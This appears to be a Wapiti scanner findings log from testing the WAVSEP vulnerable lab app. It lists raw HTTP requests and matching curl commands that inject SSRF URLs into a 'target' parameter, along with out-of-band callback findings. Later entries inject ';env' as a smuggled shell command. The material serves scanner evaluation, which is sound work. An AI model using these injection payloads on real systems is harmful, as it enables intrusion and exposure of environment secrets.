POST /wavsep/active/RFI/RFI-Detection-Evaluation-POST-302Redirect/Case01-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultFullInput-AnyPathReq-Read.jsp HTTP/1.1 Host: 127.0.0.1:8090 Referer: http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-POST-302Redirect/Case01-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultFullInput-AnyPathReq-Read.jsp Content-Type: application/x-www-form-urlencoded target=http%3A%2F%2Fexternal.url%2Fpage
curl "http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-POST-302Redirect/Case01-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultFullInput-AnyPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-POST-302Redirect/Case01-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultFullInput-AnyPathReq-Read.jsp" -d "target=http%3A%2F%2Fexternal.url%2Fpage"
SSRF vulnerability via injection in the parameter target. The target performed an outgoing HTTP GET request at 2018-05-29T04:05:39+02:00 with IP 174.119.60.74. Full request can be seen at https://wapiti3.ovh/ssrf_data/rk08f4/1958/746172676574/1527559539-174.119.60.74.txt
POST /wavsep/active/RFI/RFI-Detection-Evaluation-POST-302Redirect/Case02-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultRelativeInput-AnyPathReq-Read.jsp HTTP/1.1 Host: 127.0.0.1:8090 Referer: http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-POST-302Redirect/Case02-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultRelativeInput-AnyPathReq-Read.jsp Content-Type: application/x-www-form-urlencoded target=http%3A%2F%2Fexternal.url%2Fpage
curl "http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-POST-302Redirect/Case02-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultRelativeInput-AnyPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-POST-302Redirect/Case02-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultRelativeInput-AnyPathReq-Read.jsp" -d "target=http%3A%2F%2Fexternal.url%2Fpage"
SSRF vulnerability via injection in the parameter target. The target performed an outgoing HTTP GET request at 2018-05-29T04:05:39+02:00 with IP 174.119.60.74. Full request can be seen at https://wapiti3.ovh/ssrf_data/rk08f4/1959/746172676574/1527559539-174.119.60.74.txt
POST /wavsep/active/RFI/RFI-Detection-Evaluation-POST-302Redirect/Case04-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultEmptyInput-AnyPathReq-Read.jsp HTTP/1.1 Host: 127.0.0.1:8090 Referer: http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-POST-302Redirect/Case04-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultEmptyInput-AnyPathReq-Read.jsp Content-Type: application/x-www-form-urlencoded target=http%3A%2F%2Fexternal.url%2Fpage
curl "http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-POST-302Redirect/Case04-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultEmptyInput-AnyPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-POST-302Redirect/Case04-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultEmptyInput-AnyPathReq-Read.jsp" -d "target=http%3A%2F%2Fexternal.url%2Fpage"
SSRF vulnerability via injection in the parameter target. The target performed an outgoing HTTP GET request at 2018-05-29T04:05:39+02:00 with IP 174.119.60.74. Full request can be seen at https://wapiti3.ovh/ssrf_data/rk08f4/1961/746172676574/1527559539-174.119.60.74.txt
POST /wavsep/active/RFI/RFI-Detection-Evaluation-POST-302Redirect/Case03-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultInvalidInput-AnyPathReq-Read.jsp HTTP/1.1 Host: 127.0.0.1:8090 Referer: http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-POST-302Redirect/Case03-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultInvalidInput-AnyPathReq-Read.jsp Content-Type: application/x-www-form-urlencoded target=http%3A%2F%2Fexternal.url%2Fpage
curl "http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-POST-302Redirect/Case03-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultInvalidInput-AnyPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-POST-302Redirect/Case03-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultInvalidInput-AnyPathReq-Read.jsp" -d "target=http%3A%2F%2Fexternal.url%2Fpage"
SSRF vulnerability via injection in the parameter target. The target performed an outgoing HTTP GET request at 2018-05-29T04:05:20+02:00 with IP 174.119.60.74. Full request can be seen at https://wapiti3.ovh/ssrf_data/rk08f4/216/746172676574/1527559520-174.119.60.74.txt
GET /wavsep/active/RFI/RFI-Detection-Evaluation-GET-200Valid/Case01-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultFullInput-AnyPathReq-Read.jsp?target=http%3A%2F%2Fexternal.url%2Fpage HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-GET-200Valid/Case01-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultFullInput-AnyPathReq-Read.jsp?target=http%3A%2F%2Fexternal.url%2Fpage"
SSRF vulnerability via injection in the parameter target. The target performed an outgoing HTTP GET request at 2018-05-29T04:05:20+02:00 with IP 174.119.60.74. Full request can be seen at https://wapiti3.ovh/ssrf_data/rk08f4/222/746172676574/1527559520-174.119.60.74.txt
GET /wavsep/active/RFI/RFI-Detection-Evaluation-GET-200Valid/Case03-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultInvalidInput-AnyPathReq-Read.jsp?target=http%3A%2F%2Fexternal.url%2Fpage HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-GET-200Valid/Case03-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultInvalidInput-AnyPathReq-Read.jsp?target=http%3A%2F%2Fexternal.url%2Fpage"
SSRF vulnerability via injection in the parameter target. The target performed an outgoing HTTP GET request at 2018-05-29T04:05:21+02:00 with IP 174.119.60.74. Full request can be seen at https://wapiti3.ovh/ssrf_data/rk08f4/224/746172676574/1527559521-174.119.60.74.txt
GET /wavsep/active/RFI/RFI-Detection-Evaluation-GET-200Valid/Case04-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultEmptyInput-AnyPathReq-Read.jsp?target=http%3A%2F%2Fexternal.url%2Fpage HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-GET-200Valid/Case04-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultEmptyInput-AnyPathReq-Read.jsp?target=http%3A%2F%2Fexternal.url%2Fpage"
SSRF vulnerability via injection in the parameter target. The target performed an outgoing HTTP GET request at 2018-05-29T04:05:20+02:00 with IP 174.119.60.74. Full request can be seen at https://wapiti3.ovh/ssrf_data/rk08f4/225/746172676574/1527559520-174.119.60.74.txt
GET /wavsep/active/RFI/RFI-Detection-Evaluation-GET-200Valid/Case02-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultRelativeInput-AnyPathReq-Read.jsp?target=http%3A%2F%2Fexternal.url%2Fpage HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-GET-200Valid/Case02-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultRelativeInput-AnyPathReq-Read.jsp?target=http%3A%2F%2Fexternal.url%2Fpage"
SSRF vulnerability via injection in the parameter target. The target performed an outgoing HTTP GET request at 2018-05-29T04:05:22+02:00 with IP 174.119.60.74. Full request can be seen at https://wapiti3.ovh/ssrf_data/rk08f4/235/746172676574/1527559522-174.119.60.74.txt
GET /wavsep/active/RFI/RFI-Detection-Evaluation-GET-500Error/Case01-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultFullInput-AnyPathReq-Read.jsp?target=http%3A%2F%2Fexternal.url%2Fpage HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-GET-500Error/Case01-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultFullInput-AnyPathReq-Read.jsp?target=http%3A%2F%2Fexternal.url%2Fpage"
SSRF vulnerability via injection in the parameter target. The target performed an outgoing HTTP GET request at 2018-05-29T04:05:22+02:00 with IP 174.119.60.74. Full request can be seen at https://wapiti3.ovh/ssrf_data/rk08f4/242/746172676574/1527559522-174.119.60.74.txt
GET /wavsep/active/RFI/RFI-Detection-Evaluation-GET-500Error/Case04-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultEmptyInput-AnyPathReq-Read.jsp?target=http%3A%2F%2Fexternal.url%2Fpage HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-GET-500Error/Case04-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultEmptyInput-AnyPathReq-Read.jsp?target=http%3A%2F%2Fexternal.url%2Fpage"
SSRF vulnerability via injection in the parameter target. The target performed an outgoing HTTP GET request at 2018-05-29T04:05:22+02:00 with IP 174.119.60.74. Full request can be seen at https://wapiti3.ovh/ssrf_data/rk08f4/243/746172676574/1527559522-174.119.60.74.txt
GET /wavsep/active/RFI/RFI-Detection-Evaluation-GET-500Error/Case02-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultRelativeInput-AnyPathReq-Read.jsp?target=http%3A%2F%2Fexternal.url%2Fpage HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-GET-500Error/Case02-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultRelativeInput-AnyPathReq-Read.jsp?target=http%3A%2F%2Fexternal.url%2Fpage"
SSRF vulnerability via injection in the parameter target. The target performed an outgoing HTTP GET request at 2018-05-29T04:05:22+02:00 with IP 174.119.60.74. Full request can be seen at https://wapiti3.ovh/ssrf_data/rk08f4/244/746172676574/1527559522-174.119.60.74.txt
GET /wavsep/active/RFI/RFI-Detection-Evaluation-GET-500Error/Case03-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultInvalidInput-AnyPathReq-Read.jsp?target=http%3A%2F%2Fexternal.url%2Fpage HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-GET-500Error/Case03-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultInvalidInput-AnyPathReq-Read.jsp?target=http%3A%2F%2Fexternal.url%2Fpage"
SSRF vulnerability via injection in the parameter target. The target performed an outgoing HTTP GET request at 2018-05-29T04:05:21+02:00 with IP 174.119.60.74. Full request can be seen at https://wapiti3.ovh/ssrf_data/rk08f4/264/746172676574/1527559521-174.119.60.74.txt
GET /wavsep/active/RFI/RFI-Detection-Evaluation-GET-302Redirect/Case03-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultInvalidInput-AnyPathReq-Read.jsp?target=http%3A%2F%2Fexternal.url%2Fpage HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-GET-302Redirect/Case03-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultInvalidInput-AnyPathReq-Read.jsp?target=http%3A%2F%2Fexternal.url%2Fpage"
SSRF vulnerability via injection in the parameter target. The target performed an outgoing HTTP GET request at 2018-05-29T04:05:21+02:00 with IP 174.119.60.74. Full request can be seen at https://wapiti3.ovh/ssrf_data/rk08f4/265/746172676574/1527559521-174.119.60.74.txt
GET /wavsep/active/RFI/RFI-Detection-Evaluation-GET-302Redirect/Case01-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultFullInput-AnyPathReq-Read.jsp?target=http%3A%2F%2Fexternal.url%2Fpage HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-GET-302Redirect/Case01-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultFullInput-AnyPathReq-Read.jsp?target=http%3A%2F%2Fexternal.url%2Fpage"
SSRF vulnerability via injection in the parameter target. The target performed an outgoing HTTP GET request at 2018-05-29T04:05:21+02:00 with IP 174.119.60.74. Full request can be seen at https://wapiti3.ovh/ssrf_data/rk08f4/266/746172676574/1527559521-174.119.60.74.txt
GET /wavsep/active/RFI/RFI-Detection-Evaluation-GET-302Redirect/Case02-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultRelativeInput-AnyPathReq-Read.jsp?target=http%3A%2F%2Fexternal.url%2Fpage HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-GET-302Redirect/Case02-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultRelativeInput-AnyPathReq-Read.jsp?target=http%3A%2F%2Fexternal.url%2Fpage"
SSRF vulnerability via injection in the parameter target. The target performed an outgoing HTTP GET request at 2018-05-29T04:05:21+02:00 with IP 174.119.60.74. Full request can be seen at https://wapiti3.ovh/ssrf_data/rk08f4/269/746172676574/1527559521-174.119.60.74.txt
GET /wavsep/active/RFI/RFI-Detection-Evaluation-GET-302Redirect/Case04-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultEmptyInput-AnyPathReq-Read.jsp?target=http%3A%2F%2Fexternal.url%2Fpage HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-GET-302Redirect/Case04-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultEmptyInput-AnyPathReq-Read.jsp?target=http%3A%2F%2Fexternal.url%2Fpage"
SSRF vulnerability via injection in the parameter target. The target performed an outgoing HTTP GET request at 2018-05-29T04:05:53+02:00 with IP 174.119.60.74. Full request can be seen at https://wapiti3.ovh/ssrf_data/rk08f4/2703/746172676574/1527559553-174.119.60.74.txt
POST /wavsep/active/Unvalidated-Redirect/Redirect-FalsePositives-GET/Case06-Redirect-FalsePositive-RFI-TextHtmlValidResponse-FilenameContext-Unrestricted-OSPath-DefaultFullInput-NoPathReq-Read.jsp HTTP/1.1 Host: 127.0.0.1:8090 Referer: http://127.0.0.1:8090/wavsep/active/Unvalidated-Redirect/Redirect-FalsePositives-GET/Case06-Redirect-FalsePositive-RFI-TextHtmlValidResponse-FilenameContext-Unrestricted-OSPath-DefaultFullInput-NoPathReq-Read.jsp Content-Type: application/x-www-form-urlencoded target=http%3A%2F%2Fexternal.url%2Fpage
curl "http://127.0.0.1:8090/wavsep/active/Unvalidated-Redirect/Redirect-FalsePositives-GET/Case06-Redirect-FalsePositive-RFI-TextHtmlValidResponse-FilenameContext-Unrestricted-OSPath-DefaultFullInput-NoPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/Unvalidated-Redirect/Redirect-FalsePositives-GET/Case06-Redirect-FalsePositive-RFI-TextHtmlValidResponse-FilenameContext-Unrestricted-OSPath-DefaultFullInput-NoPathReq-Read.jsp" -d "target=http%3A%2F%2Fexternal.url%2Fpage"
SSRF vulnerability via injection in the parameter target. The target performed an outgoing HTTP GET request at 2018-05-29T04:05:42+02:00 with IP 174.119.60.74. Full request can be seen at https://wapiti3.ovh/ssrf_data/rk08f4/2711/746172676574/1527559542-174.119.60.74.txt
POST /wavsep/active/RFI/RFI-FalsePositives-GET/Case05-RFI-FalsePositive-UrlClass-TextHtmlValidResponse-FilenameContext-EnumerationResponseOnly-OSPath-DefaultRelativeInput-NoPathReq-Read.jsp HTTP/1.1 Host: 127.0.0.1:8090 Referer: http://127.0.0.1:8090/wavsep/active/RFI/RFI-FalsePositives-GET/Case05-RFI-FalsePositive-UrlClass-TextHtmlValidResponse-FilenameContext-EnumerationResponseOnly-OSPath-DefaultRelativeInput-NoPathReq-Read.jsp Content-Type: application/x-www-form-urlencoded target=http%3A%2F%2Fexternal.url%2Fpage
curl "http://127.0.0.1:8090/wavsep/active/RFI/RFI-FalsePositives-GET/Case05-RFI-FalsePositive-UrlClass-TextHtmlValidResponse-FilenameContext-EnumerationResponseOnly-OSPath-DefaultRelativeInput-NoPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/RFI/RFI-FalsePositives-GET/Case05-RFI-FalsePositive-UrlClass-TextHtmlValidResponse-FilenameContext-EnumerationResponseOnly-OSPath-DefaultRelativeInput-NoPathReq-Read.jsp" -d "target=http%3A%2F%2Fexternal.url%2Fpage"
SSRF vulnerability via injection in the parameter target. The target performed an outgoing HTTP GET request at 2018-05-29T04:05:20+02:00 with IP 174.119.60.74. Full request can be seen at https://wapiti3.ovh/ssrf_data/rk08f4/283/746172676574/1527559520-174.119.60.74.txt
GET /wavsep/active/RFI/RFI-Detection-Evaluation-GET-200Identical/Case02-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultRelativeInput-AnyPathReq-Read.jsp?target=http%3A%2F%2Fexternal.url%2Fpage HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-GET-200Identical/Case02-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultRelativeInput-AnyPathReq-Read.jsp?target=http%3A%2F%2Fexternal.url%2Fpage"
SSRF vulnerability via injection in the parameter target. The target performed an outgoing HTTP GET request at 2018-05-29T04:05:20+02:00 with IP 174.119.60.74. Full request can be seen at https://wapiti3.ovh/ssrf_data/rk08f4/287/746172676574/1527559520-174.119.60.74.txt
GET /wavsep/active/RFI/RFI-Detection-Evaluation-GET-200Identical/Case03-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultInvalidInput-AnyPathReq-Read.jsp?target=http%3A%2F%2Fexternal.url%2Fpage HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-GET-200Identical/Case03-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultInvalidInput-AnyPathReq-Read.jsp?target=http%3A%2F%2Fexternal.url%2Fpage"
SSRF vulnerability via injection in the parameter target. The target performed an outgoing HTTP GET request at 2018-05-29T04:05:20+02:00 with IP 174.119.60.74. Full request can be seen at https://wapiti3.ovh/ssrf_data/rk08f4/293/746172676574/1527559520-174.119.60.74.txt
GET /wavsep/active/RFI/RFI-Detection-Evaluation-GET-200Identical/Case04-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultEmptyInput-AnyPathReq-Read.jsp?target=http%3A%2F%2Fexternal.url%2Fpage HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-GET-200Identical/Case04-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultEmptyInput-AnyPathReq-Read.jsp?target=http%3A%2F%2Fexternal.url%2Fpage"
SSRF vulnerability via injection in the parameter target. The target performed an outgoing HTTP GET request at 2018-05-29T04:05:20+02:00 with IP 174.119.60.74. Full request can be seen at https://wapiti3.ovh/ssrf_data/rk08f4/295/746172676574/1527559520-174.119.60.74.txt
GET /wavsep/active/RFI/RFI-Detection-Evaluation-GET-200Identical/Case01-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultFullInput-AnyPathReq-Read.jsp?target=http%3A%2F%2Fexternal.url%2Fpage HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-GET-200Identical/Case01-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultFullInput-AnyPathReq-Read.jsp?target=http%3A%2F%2Fexternal.url%2Fpage"
SSRF vulnerability via injection in the parameter target. The target performed an outgoing HTTP GET request at 2018-05-29T04:05:21+02:00 with IP 174.119.60.74. Full request can be seen at https://wapiti3.ovh/ssrf_data/rk08f4/307/746172676574/1527559521-174.119.60.74.txt
GET /wavsep/active/RFI/RFI-Detection-Evaluation-GET-404Error/Case01-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultFullInput-AnyPathReq-Read.jsp?target=http%3A%2F%2Fexternal.url%2Fpage HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-GET-404Error/Case01-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultFullInput-AnyPathReq-Read.jsp?target=http%3A%2F%2Fexternal.url%2Fpage"
SSRF vulnerability via injection in the parameter target. The target performed an outgoing HTTP GET request at 2018-05-29T04:05:22+02:00 with IP 174.119.60.74. Full request can be seen at https://wapiti3.ovh/ssrf_data/rk08f4/313/746172676574/1527559522-174.119.60.74.txt
GET /wavsep/active/RFI/RFI-Detection-Evaluation-GET-404Error/Case02-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultRelativeInput-AnyPathReq-Read.jsp?target=http%3A%2F%2Fexternal.url%2Fpage HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-GET-404Error/Case02-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultRelativeInput-AnyPathReq-Read.jsp?target=http%3A%2F%2Fexternal.url%2Fpage"
SSRF vulnerability via injection in the parameter target. The target performed an outgoing HTTP GET request at 2018-05-29T04:05:22+02:00 with IP 174.119.60.74. Full request can be seen at https://wapiti3.ovh/ssrf_data/rk08f4/317/746172676574/1527559522-174.119.60.74.txt
GET /wavsep/active/RFI/RFI-Detection-Evaluation-GET-404Error/Case03-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultInvalidInput-AnyPathReq-Read.jsp?target=http%3A%2F%2Fexternal.url%2Fpage HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-GET-404Error/Case03-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultInvalidInput-AnyPathReq-Read.jsp?target=http%3A%2F%2Fexternal.url%2Fpage"
SSRF vulnerability via injection in the parameter target. The target performed an outgoing HTTP GET request at 2018-05-29T04:05:22+02:00 with IP 174.119.60.74. Full request can be seen at https://wapiti3.ovh/ssrf_data/rk08f4/319/746172676574/1527559522-174.119.60.74.txt
GET /wavsep/active/RFI/RFI-Detection-Evaluation-GET-404Error/Case04-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultEmptyInput-AnyPathReq-Read.jsp?target=http%3A%2F%2Fexternal.url%2Fpage HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-GET-404Error/Case04-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultEmptyInput-AnyPathReq-Read.jsp?target=http%3A%2F%2Fexternal.url%2Fpage"
SSRF vulnerability via injection in the parameter target. The target performed an outgoing HTTP GET request at 2018-05-29T04:05:19+02:00 with IP 174.119.60.74. Full request can be seen at https://wapiti3.ovh/ssrf_data/rk08f4/325/746172676574/1527559519-174.119.60.74.txt
GET /wavsep/active/RFI/RFI-Detection-Evaluation-GET-200Error/Case01-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultFullInput-AnyPathReq-Read.jsp?target=http%3A%2F%2Fexternal.url%2Fpage HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-GET-200Error/Case01-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultFullInput-AnyPathReq-Read.jsp?target=http%3A%2F%2Fexternal.url%2Fpage"
SSRF vulnerability via injection in the parameter target. The target performed an outgoing HTTP GET request at 2018-05-29T04:05:19+02:00 with IP 174.119.60.74. Full request can be seen at https://wapiti3.ovh/ssrf_data/rk08f4/327/746172676574/1527559519-174.119.60.74.txt
GET /wavsep/active/RFI/RFI-Detection-Evaluation-GET-200Error/Case03-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultInvalidInput-AnyPathReq-Read.jsp?target=http%3A%2F%2Fexternal.url%2Fpage HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-GET-200Error/Case03-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultInvalidInput-AnyPathReq-Read.jsp?target=http%3A%2F%2Fexternal.url%2Fpage"
SSRF vulnerability via injection in the parameter target. The target performed an outgoing HTTP GET request at 2018-05-29T04:05:19+02:00 with IP 174.119.60.74. Full request can be seen at https://wapiti3.ovh/ssrf_data/rk08f4/330/746172676574/1527559519-174.119.60.74.txt
GET /wavsep/active/RFI/RFI-Detection-Evaluation-GET-200Error/Case04-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultEmptyInput-AnyPathReq-Read.jsp?target=http%3A%2F%2Fexternal.url%2Fpage HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-GET-200Error/Case04-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultEmptyInput-AnyPathReq-Read.jsp?target=http%3A%2F%2Fexternal.url%2Fpage"
SSRF vulnerability via injection in the parameter target. The target performed an outgoing HTTP GET request at 2018-05-29T04:05:19+02:00 with IP 174.119.60.74. Full request can be seen at https://wapiti3.ovh/ssrf_data/rk08f4/340/746172676574/1527559519-174.119.60.74.txt
GET /wavsep/active/RFI/RFI-Detection-Evaluation-GET-200Error/Case02-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultRelativeInput-AnyPathReq-Read.jsp?target=http%3A%2F%2Fexternal.url%2Fpage HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-GET-200Error/Case02-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultRelativeInput-AnyPathReq-Read.jsp?target=http%3A%2F%2Fexternal.url%2Fpage"
The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case01-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-AnyPathReq-Read.jsp?target=%3Benv HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case01-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-AnyPathReq-Read.jsp?target=%3Benv"
The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case02-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-AnyPathReq-Read.jsp?target=%3Benv HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case02-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-AnyPathReq-Read.jsp?target=%3Benv"
The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case03-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultRelativeInput-AnyPathReq-Read.jsp?target=%3Benv HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case03-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultRelativeInput-AnyPathReq-Read.jsp?target=%3Benv"
The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case05-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-AnyPathReq-Read.jsp?target=%3Benv HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case05-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-AnyPathReq-Read.jsp?target=%3Benv"
The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case06-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-AnyPathReq-Read.jsp?target=%3Benv HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case06-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-AnyPathReq-Read.jsp?target=%3Benv"
The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case07-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-AnyPathReq-Read.jsp?target=%3Benv HTTP/1.1 Host: 127.0.0.1:8090
